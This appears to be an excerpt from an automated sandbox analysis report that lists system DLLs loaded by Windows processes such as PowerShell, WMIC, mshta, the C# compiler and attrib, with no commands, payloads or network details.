Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\doskey.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\doskey.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
